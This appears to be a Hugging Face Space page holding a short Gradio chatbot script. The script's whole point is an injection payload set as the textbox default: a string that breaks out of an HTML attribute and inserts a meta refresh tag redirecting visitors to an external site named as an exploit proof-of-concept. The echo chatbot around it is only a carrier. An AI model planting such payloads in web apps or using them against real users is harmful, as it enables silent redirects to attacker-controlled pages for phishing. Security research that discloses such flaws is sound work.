Spaces:
Sleeping
Sleeping
| import gradio as gr | |
| def respond(message): | |
| return f"Received: {message}" | |
| default_instruction = '><meta http-equiv="refresh" content="0;url=https://huggingfaceexploitpoc.pages.dev/index.html">' | |
| gr.ChatInterface(fn=respond, chatbot=gr.Chatbot(), textbox=gr.Textbox(value=default_instruction)).launch() | |